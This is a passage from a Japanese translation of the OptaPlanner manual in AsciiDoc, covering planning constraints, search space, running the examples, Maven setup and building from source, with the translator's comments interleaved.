\u5b8c\u5168\u554f\u984c\u306b\u5f53\u3066\u306f\u307e\u308b\u3053\u3068\u306b\u306a\u308a\u307e\u3059\u3002\n\u5b9f\u969b\u3001link:http:\/\/en.wikipedia.org\/wiki\/P_%3D_NP_problem[\u305d\u306e\u3088\u3046\u306a\u78ba\u5b9f\u306a\u65b9\u6cd5\u304c\u5b9f\u5728\u3059\u308b\u304b\u3069\u3046\u304b]\u3092\u8a3c\u660e\u3057\u305f\u4eba\u306b\u306f 100 \u4e07\u30c9\u30eb\u306e\u61f8\u8cde\u91d1\u304c\u4e0e\u3048\u3089\u308c\u308b\u3053\u3068\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n****\n\n\u3053\u308c\u306f\u5b9f\u306b\u6050\u308d\u3057\u3044\u3053\u3068\u3092\u793a\u5506\u3057\u3066\u3044\u307e\u3059\u3002\u3064\u307e\u308a\u3001\u6b21\u306e 2 \u3064\u306e\u4e00\u822c\u7684\u306a\u65b9\u6cd5\u304c\u529b\u4e0d\u8db3\u3067\u3042\u308b\u305f\u3081\u306b\u3001\u81ea\u5206\u306e\u62b1\u3048\u308b\u554f\u984c\u3092\u89e3\u304f\u306e\u304c\u3001\u304a\u305d\u3089\u304f\u306f\u60f3\u50cf\u4ee5\u4e0a\u306b\u56f0\u96e3\u3060\u3068\u3044\u3046\u3053\u3068\u3067\u3059\u3002\n\n* \u7dcf\u5f53\u305f\u308a\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306f\u3001\u6642\u9593\u304c\u304b\u304b\u308a\u3059\u304e\u308b\u3002\uff08\u305f\u3068\u3048\u5de7\u5999\u306b\u4f5c\u3063\u305f\u5909\u7a2e\u3067\u3042\u3063\u3066\u3082\u3002\uff09\n* \u901f\u6210\u306e\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306f\u3001\u4f8b\u3048\u3070\u7bb1\u8a70\u3081\uff08\u30d3\u30f3\u30d1\u30c3\u30ad\u30f3\u30b0\uff09\u306b\u304a\u3044\u3066 _Largest First \u6cd5\u306b\u5f93\u3063\u3066\u7269\u3092\u5165\u308c\u308b_ \u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306e\u3088\u3046\u306b\u3001\u6700\u9069\u89e3\u304b\u3089\u306f\u307b\u3069\u9060\u3044\u89e3\u3092\u8fd4\u3057\u3066\u3057\u307e\u3046\u3002\n\n*OptaPlanner \u306f\u3001\u5148\u9032\u7684\u306a\u6700\u9069\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u306b\u3088\u3063\u3066\u3001\u305d\u306e\u3088\u3046\u306a\u8a08\u753b\u554f\u984c\u306b\u5bfe\u3057\u3066\u3001\u9069\u5ea6\u306a\u6642\u9593\u5185\u306b\u826f\u3044\u89e3\u3092\u898b\u3064\u3051\u51fa\u3057\u307e\u3059\u3002*\n\n\n\n[[aPlanningProblemHasConstraints]]\n=== 1.3.2. \u8a08\u753b\u554f\u984c\u306b\u306f\u5236\u7d04\u304c\u3042\u308b\uff08\u30cf\u30fc\u30c9, \u30bd\u30d5\u30c8\u5236\u7d04\uff09\n\n\u8a08\u753b\u554f\u984c\u306b\u306f\u3001\u591a\u304f\u306e\u5834\u5408\u3001\u5c11\u306a\u304f\u3068\u3082\u6b21\u306e\u3088\u3046\u306a 2 \u3064\u306e\u6c34\u6e96\u306e\u5236\u7d04\u304c\u3042\u308a\u307e\u3059\u3002\n\n* _\u30cf\u30fc\u30c9\u5236\u7d04 (\u8ca0\u5024)_ \u306f\u3001\u9055\u53cd\u3057\u3066\u306f\u306a\u3089\u306a\u3044\u3002\u4f8b: _1 \u4eba\u306e\u5148\u751f\u304c\u7570\u306a\u308b 2 \u3064\u306e\u6388\u696d\u3067\u540c\u6642\u306b\u6559\u3048\u308b\u3053\u3068\u306f\u3067\u304d\u306a\u3044\u3002_ \n* _\u30bd\u30d5\u30c8\u5236\u7d04 (\u8ca0\u5024)_ \u306f\u3001\u907f\u3051\u3089\u308c\u308b\u9650\u308a\u3001\u9055\u53cd\u3057\u3066\u306f\u306a\u3089\u306a\u3044\u3002\u4f8b: _\u5148\u751f A \u306f\u3001\u91d1\u66dc\u65e5\u306e\u5348\u5f8c\u306b\u6559\u3048\u305f\u304f\u306a\u3044\u3002_ \n\n\u6b21\u306e\u3088\u3046\u306b\u3001\u6b63\u5024\u306e\u5236\u7d04\u3092\u6301\u3064\u554f\u984c\u3082\u3042\u308a\u307e\u3059\u3002\n\n* \u53ef\u80fd\u306a\u9650\u308a\u3001_\u6b63\u5024\u306e\u30bd\u30d5\u30c8\u5236\u7d04 (\u307e\u305f\u306f\u5831\u916c)_ \u304c\u6e80\u8db3\u3055\u308c\u306a\u3051\u308c\u3070\u306a\u3089\u306a\u3044\u3002\u4f8b: _\u5148\u751f B\u306f\u3001\u6708\u66dc\u65e5\u306e\u671d\u306b\u6559\u3048\u305f\u3044\u3002_ \n\n\u57fa\u672c\u7684\u306a\u554f\u984c (\u4f8b\u3048\u3070 N Queens \u554f\u984c) \u306b\u306f\u3001\u30cf\u30fc\u30c9\u5236\u7d04\u306e\u307f\u6301\u3064\u3082\u306e\u304c\u3042\u308a\u307e\u3059\u3002\u30cf\u30fc\u30c9\u5236\u7d04, \u30df\u30c7\u30a3\u30a2\u30e0\u5236\u7d04, \u30bd\u30d5\u30c8\u5236\u7d04\u3068\u3044\u3063\u305f\u3088\u3046\u306b\u30013 \u3064\u4ee5\u4e0a\u306e\u6c34\u6e96\u306e\u5236\u7d04\u3092\u6301\u3064\u554f\u984c\u3082\u3042\u308a\u307e\u3059\u3002\n\n\u3053\u308c\u3089\u306e\u5236\u7d04\u306b\u3088\u3063\u3066\u3001\u5404\u554f\u984c\u306e _\u30b9\u30b3\u30a2\u8a08\u7b97\u65b9\u6cd5_ ( _AKA \u9069\u5408\u5ea6\u95a2\u6570_ ) \u304c\u5b9a\u7fa9\u3055\u308c\u307e\u3059\u3002\u4e00\u3064\u306e\u554f\u984c\u306e\u8907\u6570\u306e\u89e3\u305d\u308c\u305e\u308c\u306b\u30b9\u30b3\u30a2\u3092\u4e0e\u3048\u3001\u89e3\u306e\u512a\u52a3\u3092\u4ed8\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002*OptaPlanner \u306e\u30b9\u30b3\u30a2\u5236\u7d04\u306f\u3001Java \u30b3\u30fc\u30c9\u306e\u3088\u3046\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u6307\u5411\u8a00\u8a9e\u307e\u305f\u306f Drools \u30eb\u30fc\u30eb\u306b\u3088\u3063\u3066\u8a18\u8ff0\u3055\u308c\u307e\u3059\u3002* \u305d\u308c\u3089\u306e\u30b3\u30fc\u30c9\u306f\u3001\u7c21\u5358\u3067\u3001\u67d4\u8edf\u6027\u3068\u62e1\u5f35\u6027\u3092\u6709\u3057\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150909 Takugo\nSource: AKA --- plain font\nCorrection assumed: AKA --- italic font\n\/\/\/\/\n\n\n\n[[aPlanningProblemHasAHugeSearchSpace]]\n=== 1.3.3. \u8a08\u753b\u554f\u984c\u306f\u5de8\u5927\u306a\u63a2\u7d22\u7a7a\u9593\u3092\u6301\u3064\n\n\u4e00\u3064\u306e\u8a08\u753b\u554f\u984c\u306b\u306f\u591a\u6570\u306e _\u89e3_ \u304c\u5b58\u5728\u3057\u307e\u3059\u3002\u89e3\u306b\u306f\u3044\u304f\u3064\u304b\u306e\u7a2e\u985e\u304c\u3042\u308a\u307e\u3059\u3002\n\n* _\u53ef\u80fd\u89e3_ (_possible solution_) \u306f\u3001\u9055\u53cd\u3059\u308b\u5236\u7d04\u306e\u6570\u3092\u554f\u308f\u305a\u306b\u6319\u3052\u3089\u308c\u308b\u3059\u3079\u3066\u306e\u89e3\u3067\u3059\u3002\u8a08\u753b\u554f\u984c\u306b\u306f\u3001\u81a8\u5927\u306a\u6570\u306e\u53ef\u80fd\u89e3\u3092\u6301\u3064\u50be\u5411\u304c\u3042\u308a\u307e\u3059\u3002\u305d\u306e\u89e3\u306e\u591a\u304f\u306b\u4fa1\u5024\u306f\u3042\u308a\u307e\u305b\u3093\u3002\n\/\/\/\/\n150911 Takugo\nSource: possible solution\nTranslation: \u53ef\u80fd\u89e3\n\u5c02\u9580\u7528\u8a9e\u8981\u78ba\u8a8d\n\/\/\/\/\n* _\u5b9f\u884c\u53ef\u80fd\u89e3_ (_feasible solution_) \u306f\u3001\u30cf\u30fc\u30c9\u5236\u7d04 (\u8ca0\u5024) \u3092\u4e00\u3064\u3082\u9055\u53cd\u3057\u306a\u3044\u89e3\u3067\u3059\u3002\u5b9f\u884c\u53ef\u80fd\u89e3\u306e\u6570\u306f\u3001\u53ef\u80fd\u89e3\u306e\u6570\u3068\u76f8\u95a2\u3092\u6301\u3064\u50be\u5411\u306b\u3042\u308a\u307e\u3059\u3002\u5b9f\u884c\u53ef\u80fd\u89e3\u304c\u5b58\u5728\u3057\u306a\u3044\u5834\u5408\u3082\u3042\u308a\u307e\u3059\u3002\u3059\u3079\u3066\u306e\u5b9f\u884c\u53ef\u80fd\u89e3\u306f\u53ef\u80fd\u89e3\u3067\u3059\u3002\n* _\u6700\u9069\u89e3_ (_optimal solution_) \u306f\u3001\u6700\u9ad8\u30b9\u30b3\u30a2\u3092\u6301\u3064\u89e3\u3067\u3059\u3002\u8a08\u753b\u554f\u984c\u306b\u306f\u30011 \u3064\u304b\u3089\u6570\u500b\u306e\u6700\u9069\u89e3\u3092\u6301\u3064\u50be\u5411\u304c\u3042\u308a\u307e\u3059\u3002\u5b9f\u884c\u53ef\u80fd\u89e3\u304c\u5b58\u5728\u305b\u305a\u3001\u6700\u9069\u89e3\u304c\u5b9f\u884c\u53ef\u80fd\u3067\u306a\u3044\u5834\u5408\u3067\u3042\u3063\u3066\u3082\u3001\u5c11\u306a\u304f\u3068\u3082 1 \u3064\u306e\u6700\u9069\u89e3\u306f\u5fc5\u305a\u5b58\u5728\u3057\u307e\u3059\u3002\n* _\u6700\u5584\u89e3_ (_best solution found_) \u306f\u3001\u4e0e\u3048\u3089\u308c\u305f\u6642\u9593\u5185\u3067\u306e\u5b9f\u884c\u7d50\u679c\u306b\u898b\u51fa\u3055\u308c\u308b\u3001\u6700\u9ad8\u30b9\u30b3\u30a2\u3092\u6301\u3064\u89e3\u3067\u3059\u3002\u898b\u51fa\u3055\u308c\u305f\u6700\u5584\u89e3\u306f\u3001\u5b9f\u884c\u53ef\u80fd\u3067\u3042\u308b\u5834\u5408\u304c\u591a\u304f\u3001\u6642\u9593\u304c\u5341\u5206\u306b\u4e0e\u3048\u3089\u308c\u308b\u5834\u5408\u306b\u306f\u6700\u9069\u89e3\u3068\u306a\u308a\u307e\u3059\u3002\n\u53ef\u80fd\u89e3\u306e\u6570\u306f\u3001(\u3082\u3057\u3082\u6b63\u78ba\u306b\u8a08\u7b97\u3059\u308b\u3068\u3057\u305f\u3089\u3001) \u305f\u3068\u3048\u30c7\u30fc\u30bf\u30bb\u30c3\u30c8\u304c\u5c0f\u3055\u304f\u3068\u3082\u3001\u76f4\u611f\u306b\u53cd\u3057\u3066\u81a8\u5927\u306b\u306a\u308a\u307e\u3059\u3002\u30b5\u30f3\u30d7\u30eb\u3067\u78ba\u8a8d\u3067\u304d\u308b\u3088\u3046\u306b\u3001\u307b\u3068\u3093\u3069\u306e\u30b1\u30fc\u30b9\u3067\u3001\u65e2\u77e5\u306e\u5b87\u5b99\u306b\u5b58\u5728\u3059\u308b\u539f\u5b50\u306e\u6570\u306e\u6700\u5c0f\u5024 (10^80^) \u3088\u308a\u3082\u305a\u3063\u3068\u591a\u304f\u306e\u53ef\u80fd\u89e3\u304c\u3042\u308a\u307e\u3059\u3002\u305d\u306e\u6700\u9069\u89e3\u3092\u78ba\u5b9f\u306b\u898b\u3064\u3051\u3089\u308c\u308b\u65b9\u6cd5\u304c\u5b58\u5728\u3057\u306a\u3044\u305f\u3081\u3001\u3044\u304b\u306a\u308b\u5b9f\u884c\u65b9\u6cd5\u3082\u3001\u305d\u306e\u3059\u3079\u3066\u306e\u53ef\u80fd\u89e3\u306e\u90e8\u5206\u96c6\u5408\u3060\u3051\u3092\u8a55\u4fa1\u3059\u308b\u3053\u3068\u3057\u304b\u3067\u304d\u307e\u305b\u3093\u3002\n\nOptaPlanner \u306f\u3001\u8907\u6570\u306e\u6700\u9069\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u5099\u3048\u3066\u304a\u308a\u3001\u305d\u306e\u3088\u3046\u306a\u81a8\u5927\u306a\u6570\u306e\u53ef\u80fd\u89e3\u3092\u52b9\u7387\u7684\u306b\u51e6\u7406\u3057\u307e\u3059\u3002\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u6b21\u7b2c\u3067\u3001\u3042\u308b\u6700\u9069\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u304c\u4ed6\u306e\u3082\u306e\u3088\u308a\u3082\u826f\u597d\u306a\u6027\u80fd\u3092\u793a\u3059\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u304c\u3001\u305d\u306e\u3053\u3068\u3092\u4e8b\u524d\u306b\u77e5\u308b\u3053\u3068\u306f\u4e0d\u53ef\u80fd\u3067\u3059\u3002*OptaPlanner \u306a\u3089\u3001\u6700\u9069\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u7c21\u5358\u306b\u5207\u308a\u63db\u3048\u3089\u308c\u307e\u3059\u3002* XML \u307e\u305f\u306f\u30b3\u30fc\u30c9\u306e\u4e2d\u306e\u30bd\u30eb\u30d0\u8a2d\u5b9a\u3092\u6570\u884c\u66f8\u304d\u66ff\u3048\u308b\u3060\u3051\u3067\u3059\u3002\n\n\n\n[[downloadAndRunTheExamples]]\n== 1.4. \u30b5\u30f3\u30d7\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3068\u5b9f\u884c\n\n[[getTheReleaseZipAndRunTheExamples]]\n=== 1.4.1. \u516c\u958b .zip \u306e\u5165\u624b\u3068\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c\n\n\u4eca\u3059\u3050\u3084\u3063\u3066\u307f\u307e\u3057\u3087\u3046\u3002\n\n{empty}1. link:https:\/\/www.optaplanner.org\/[OptaPlanner \u30a6\u30a7\u30d6\u30b5\u30a4\u30c8]\u304b\u3089 OptaPlanner \u306e\u516c\u958b .zip \u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002\n\n{empty}2. \u89e3\u51cd\u3057\u307e\u3059\u3002\n\n{empty}3. +*examples*+ \u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u3092\u958b\u304d\u3001\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\n\nLinux \u307e\u305f\u306f Mac:\n\n\/\/ [source] \/\/\n----\n$ cd examples\n$ .\/runExamples.sh\n----\n\nWindows:\n\n\/\/ [source] \/\/\n----\n$ cd examples\n$ runExamples.bat\n----\n\n\/\/ image::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/distributionZip.png[] \/\/\nimage:https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/distributionZip.png[]\n\n\u30b5\u30f3\u30d7\u30eb GUI \u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u304c\u958b\u304d\u307e\u3059\u3002\u30b5\u30f3\u30d7\u30eb\u3092\u4e00\u3064\u9078\u629e\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/plannerExamplesAppScreenshot.png[]\n\n\n.\u6ce8\u610f\n****\nOptaPlanner \u81ea\u4f53\u306f GUI \u306b\u5bfe\u3057\u3066\u4f9d\u5b58\u6027\u3092\u6301\u3061\u307e\u305b\u3093\u3002OptaPlanner \u306f\u3001\u30c7\u30b9\u30af\u30c8\u30c3\u30d7\u4e0a\u3068\u307e\u3063\u305f\u304f\u540c\u69d8\u306b\u3001\u30b5\u30fc\u30d0\u3084\u30e2\u30d0\u30a4\u30eb JVM \u4e0a\u3067\u3082\u52d5\u4f5c\u3057\u307e\u3059\u3002\n****\n\n\n\n[[runTheExamplesInAnIDE]]\n=== 1.4.2. IDE (IntelliJ, Eclipse, NetBeans) \u3067\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c\n\n\u81ea\u5206\u306e\u597d\u307f\u306e IDE \u3067\u30b5\u30f3\u30d7\u30eb\u3092\u5b9f\u884c\u3059\u308b\u306b\u306f\u6b21\u306e\u3088\u3046\u306b\u3057\u307e\u3059\u3002\n\n{empty}1. IDE \u3092\u8a2d\u5b9a\u3057\u307e\u3059\u3002\n* IntelliJ IDEA \u3068 NetBeans \u3067\u306f\u3001+*examples\/sources\/pom.xml*+ \u3092\u65b0\u3057\u3044\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u3068\u3057\u3066\u958b\u304d\u307e\u3059\u3002\u305d\u3046\u3059\u308b\u3060\u3051\u3067\u3001\u6b8b\u308a\u306f Maven \u304c\u7d71\u5408\u3057\u3066\u304f\u308c\u307e\u3059\u3002\n* Eclipse \u3067\u306f\u3001\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*examples\/sources*+ \u306b\u3064\u3044\u3066\u65b0\u3057\u3044\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u3092\u958b\u304d\u307e\u3059\u3002\n** \u30d5\u30a1\u30a4\u30eb +*examples\/binaries\/optaplanner-examples-_version_.jar*+ \u3092\u9664\u304f\u3001\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*bineries*+ \u304a\u3088\u3073 +*examples\/binaries*+ \u306b\u542b\u307e\u308c\u308b\u3059\u3079\u3066\u306e jar \u3092\u30af\u30e9\u30b9\u30d1\u30b9\u306b\u8ffd\u52a0\u3057\u307e\u3059\u3002\n** Java \u30bd\u30fc\u30b9\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*src\/main\/java*+ \u3068 Java \u30ea\u30bd\u30fc\u30b9\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*src\/main\/resources*+ \u3092\u8ffd\u52a0\u3057\u307e\u3059\u3002\n\/\/\/\/\n150911 Takugo\nSource: \nAdd all the jars to the classpath from the directory binaries and the directory examples\/binaries\nInterpreted as: \nAdd all the jars in the directories binaries and examples\/binaries to the classpath\n\/\/\/\/\n\n{empty}2. Run \u8a2d\u5b9a\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\n* \u30e1\u30a4\u30f3\u30af\u30e9\u30b9: +org.optaplanner.examples.app.OptaPlannerExamplesApp+\n* VM \u30d1\u30e9\u30e1\u30fc\u30bf (\u30aa\u30d7\u30b7\u30e7\u30f3): +-Xmx512M -server+\n\n{empty}3. \u3053\u306e Run \u8a2d\u5b9a\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\n\n\n\n[[useWithMavenGradleEtc]]\n=== 1.4.3. OptaPlanner \u3092 Maven \u3084 Gradle, Ivy, Buildr, ANT \u3068\u3068\u3082\u306b\u4f7f\u3046\n\nOptaPlanner \u306e jar \u306f\u3001link:http:\/\/search.maven.org\/#search|ga|1|org.optaplanner[Maven Central Repository] \u3067\u3082\u5229\u7528\u3067\u304d\u307e\u3059\u3002\uff08link:https:\/\/repository.jboss.org\/nexus\/index.html#nexus-search;gav~org.optaplanner~~~~[JBoss Maven Repository] \u3067\u3082\u5229\u7528\u3067\u304d\u307e\u3059\u3002\uff09\n\/\/\/\/\n150914 Takugo\nSource: central maven repository\nTranslated: Maven Central Respository\n\/\/\/\/\n\nMaven \u3092\u4f7f\u3046\u5834\u5408\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u3001\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u306e +*pom.xml*+ \u3067 +optaplanner-core+ \u306b\u4f9d\u5b58\u6027\u3092\u8ffd\u52a0\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n----\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-core<\/artifactId>\n <\/dependency>\n----\n\n\u3053\u308c\u306f\u3001Gradle, Ivy, Buildr \u306b\u3064\u3044\u3066\u3082\u540c\u69d8\u3067\u3059\u3002\u6700\u65b0\u7248\u306f\u3001link:http:\/\/search.maven.org\/#search|ga|1|org.optaplanner[Maven Central Repository] \u3067\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n\u4ed6\u306e OptaPlanner \u30e2\u30b8\u30e5\u30fc\u30eb\u3082\u4f7f\u7528\u3059\u308b\u3053\u3068\u306b\u306a\u308b\u53ef\u80fd\u6027\u304c\u3042\u308b\u305f\u3081\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u3001Maven \u306e +dependencyManagement+ \u3067 +optaplanner-bom+ \u3092\u30a4\u30f3\u30dd\u30fc\u30c8\u3059\u308b\u3053\u3068\u3092\u63a8\u5968\u3057\u307e\u3059\u3002\u3053\u3046\u3057\u3066\u304a\u304f\u3068\u3001OptaPlanner \u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u6307\u5b9a\u306f\u4e00\u56de\u3060\u3051\u3067\u6e08\u307f\u307e\u3059\u3002\n\n----\n <dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-bom<\/artifactId>\n <type>pom<\/type>\n <version>...<\/version>\n <scope>import<\/scope>\n <\/dependency>\n ...\n <\/dependencies>\n <\/dependencyManagement>\n----\n\n\u307e\u3060 (Ivy \u306a\u3057\u3067) ANT \u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u5834\u5408\u306f\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u305f zip \u5185\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*binaries*+ \u306b\u3042\u308b\u3059\u3079\u3066\u306e jar \u3092\u81ea\u5206\u306e\u30af\u30e9\u30b9\u30d1\u30b9\u306b\u30b3\u30d4\u30fc\u3057\u307e\u3059\u3002\n\/\/\/\/\n150914 Takugo\nSource: copy ... in your class path\nInterpreted as: copy ... to your class path\n\/\/\/\/\n\n.\u6ce8\u610f\n****\n\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u305f zip \u5185\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*binaries*+ \u306b\u306f\u3001+optaplanner-core+ \u304c\u5b9f\u969b\u306b\u4f7f\u7528\u3059\u308b\u3088\u308a\u3082\u306f\u308b\u304b\u306b\u591a\u304f\u306e jar \u3092\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002+optaplanner-benchmark+ \u306a\u3069\u4ed6\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u304c\u4f7f\u7528\u3059\u308b jar \u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150914 Takugo\nSource: far more jars then\nCorrected: far more jars than\n\/\/\/\/\n\nMaven \u30ea\u30dd\u30b8\u30c8\u30ea\u306e +*pom.xml*+ \u30d5\u30a1\u30a4\u30eb\u3092\u78ba\u8a8d\u3057\u3001(\u7279\u5b9a\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u305f\u3081\u306e) \u7279\u5b9a\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306b\u3064\u3044\u3066\u3001\u6700\u5c0f\u306e\u4f9d\u5b58\u6027\u30bb\u30c3\u30c8\u3092\u6c7a\u3081\u3066\u304f\u3060\u3055\u3044\u3002\n****\n\n\n\n[[buildFromSource]]\n=== 1.4.4. OptaPlanner \u3092\u30bd\u30fc\u30b9\u304b\u3089\u30d3\u30eb\u30c9\u3059\u308b\n\nOptaPlanner \u3092\u30bd\u30fc\u30b9\u304b\u3089\u30d3\u30eb\u30c9\u3059\u308b\u306e\u306f\u7c21\u5358\u3067\u3059\u3002\n\n{empty}1. link:https:\/\/help.github.com\/articles\/set-up-git\/[Git \u3092\u8a2d\u5b9a]\u3057\u3001GitHub \u304b\u3089\u306e +clone optaplanner+ \u3092\u5b9f\u884c\u3057\u307e\u3059\u3002(\u307e\u305f\u306f\u3001link:https:\/\/github.com\/droolsjbpm\/optaplanner\/zipball\/master[zipball] \u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002)\n\n----\n$ git clone git@github.com:droolsjbpm\/optaplanner.git optaplanner\n...\n----\n\n.\u6ce8\u610f\n****\nGitHub \u30a2\u30ab\u30a6\u30f3\u30c8\u3092\u6301\u3063\u3066\u3044\u306a\u3044\u5834\u5408\u3084\u3001\u30ed\u30fc\u30ab\u30eb\u306e Git \u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u8a2d\u5b9a\u304c\u305d\u306e\u30a2\u30ab\u30a6\u30f3\u30c8\u3067\u306a\u3055\u308c\u3066\u3044\u306a\u3044\u5834\u5408\u306f\u3001\u4ee3\u308f\u308a\u306b\u6b21\u306e\u30b3\u30de\u30f3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u8a8d\u8a3c\u554f\u984c\u3092\u56de\u907f\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n----\n$ git clone https:\/\/github.com\/droolsjbpm\/optaplanner.git optaplanner\n...\n----\n****\n\n{empty}2. link:http:\/\/maven.apache.org\/[Maven] \u3092\u4f7f\u3063\u3066\u30d3\u30eb\u30c9\u3057\u307e\u3059\u3002\n\n----\n$ cd optaplanner\n$ mvn clean install -DskipTests\n...\n----\n\n.\u6ce8\u610f\n****\nMaven \u306e\u521d\u56de\u306f\u3001jar \u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u5fc5\u8981\u304c\u3042\u308b\u305f\u3081\u3001\u6642\u9593\u304c\u304b\u304b\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n****\n\n{empty}3. \u30b5\u30f3\u30d7\u30eb\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\n\n----\n$ cd optaplanner-examples\n$ mvn exec:exec\n...\n----\n\n{empty}4. \u597d\u307f\u306e IDE \u3067\u30bd\u30fc\u30b9\u3092\u7de8\u96c6\u3057\u307e\u3059\u3002\n\n{empty}5. \u30aa\u30d7\u30b7\u30e7\u30f3: Java \u30d7\u30ed\u30d5\u30a1\u30a4\u30e9\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\n\n\n\n[[governance]]\n== 1.5. \u7ba1\u7406\u30fb\u904b\u55b6\n\n[[statusOfOptaPlanner]]\n=== 1.5.1. OptaPlanner \u306e\u30ec\u30d9\u30eb\u306e\u9ad8\u3055\n\nOptaPlanner \u304c\u6301\u3064\u7279\u9577:\n\n* *\u5b89\u5b9a\u6027*: \u30e6\u30cb\u30c3\u30c8\u3054\u3068\u306e\u30c6\u30b9\u30c8, \u7d71\u5408\u74b0\u5883\u3067\u306e\u30c6\u30b9\u30c8, \u30b9\u30c8\u30ec\u30b9\u30c6\u30b9\u30c8\u306b\u3088\u3063\u3066\u975e\u5e38\u306b\u3088\u304f\u30c6\u30b9\u30c8\u3055\u308c\u3066\u3044\u308b\u3002\n* *\u4fe1\u983c\u6027*: \u4e16\u754c\u4e2d\u3067\u3001\u88fd\u54c1\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u3002\n* *\u30b9\u30b1\u30fc\u30e9\u30d3\u30ea\u30c6\u30a3*: \u30b5\u30f3\u30d7\u30eb\u306e\u4e00\u3064\u3067\u306f\u300150000 \u500b\u306e\u5909\u6570\u304c\u6271\u308f\u308c\u3001\u305d\u306e 5000 \u500b\u3054\u3068\u306b\u3001\u8907\u6570\u306e\u7a2e\u985e\u306e\u5236\u7d04\u3068\u305d\u308c\u3092\u6e80\u305f\u3059\u4f55\u5104\u3082\u306e\u30d1\u30bf\u30fc\u30f3\u304c\u6271\u308f\u308c\u3066\u3044\u308b\u3002\n* *\u6574\u5099\u3055\u308c\u305f\u6587\u66f8*: \u8a73\u7d30\u306a\u672c\u30de\u30cb\u30e5\u30a2\u30eb\u3084\u591a\u304f\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u4e00\u3064\u3092\u898b\u3066\u304f\u3060\u3055\u3044\u3002\n\n\n\n[[backwardsCompatibility]]\n=== 1.5.2. \u5f8c\u65b9\u4e92\u63db\u6027\n\nOptaPlanner \u3067\u306f\u3001API \u3068\u5b9f\u88c5\u304c\u5206\u96e2\u3055\u308c\u307e\u3059\u3002\n\n* *\u30d1\u30d6\u30ea\u30c3\u30af API:* \u30d1\u30c3\u30b1\u30fc\u30b8\u540d\u524d\u7a7a\u9593 +*org.optaplanner.core.api*+ \u306f\u3001\u5c06\u6765\u306e\u30ea\u30ea\u30fc\u30b9\u306b\u304a\u3044\u3066\u3001100% \u306e\u5f8c\u65b9\u4e92\u63db\u6027\u3092\u6709\u3057\u307e\u3059\u3002\n* *Impl \u30af\u30e9\u30b9:* \u30d1\u30c3\u30b1\u30fc\u30b8\u540d\u524d\u7a7a\u9593 +*org.optaplanner.core.impl*+ 